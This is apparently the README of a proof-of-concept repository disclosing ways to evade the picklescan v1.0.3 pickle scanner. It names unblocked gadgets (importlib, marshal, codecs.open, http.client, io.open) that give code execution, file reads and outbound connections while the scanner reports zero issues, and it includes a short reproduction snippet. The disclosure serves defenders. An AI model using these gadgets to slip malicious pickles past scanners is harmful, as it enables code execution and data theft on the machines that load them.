optimus-fulcria/picklescan-bypass-poc

Picklescan Scanner Bypass PoC

Multiple bypasses of picklescan v1.0.3 that achieve arbitrary code execution, file read/write, and network access while the scanner reports 0 dangerous issues.

Bypasses Demonstrated

1. Full RCE via importlib.import_module + marshal.loads + types.FunctionType

• File: rce_bypass.pkl
• Impact: Arbitrary command execution
• Technique: Chain three unblocked modules to compile and execute arbitrary Python code
• Picklescan result: 0 issues, 0 infected files

2. Arbitrary File Read via codecs.open

• File: file_read_bypass.pkl
• Impact: Read any file on the filesystem
• Technique: codecs.open is functionally identical to builtins.open but not in blocklist
• Picklescan result: 0 issues, 0 infected files

3. Network Access via http.client.HTTPSConnection

• File: network_bypass.pkl
• Impact: Establish outbound HTTPS connections for data exfiltration
• Technique: http.client is the Python 3 equivalent of blocked httplib but not blocked
• Picklescan result: 0 issues, 0 infected files

4. Additional bypasses (not included as files):

• io.open - identical to builtins.open, not blocked
• importlib.import_module('os') - imports any module including os

Root Cause

Picklescan uses a blocklist-only architecture. Only globals explicitly listed in _unsafe_globals increment issues_count. Everything else is classified as "suspicious" but does not cause the scan to fail. This means ANY standard library module not in the blocklist can be exploited.

Reproduction

import pickle
from picklescan.scanner import scan_file_path

# Scan - reports clean
result = scan_file_path("rce_bypass.pkl")
print(f"Issues: {result.issues_count}")  # Output: 0

# Load - executes arbitrary code
pickle.loads(open("rce_bypass.pkl", "rb").read())  # Executes system command

Affected Version

• picklescan 1.0.3 (latest as of Feb 2026)
• All prior versions likely affected (same blocklist architecture)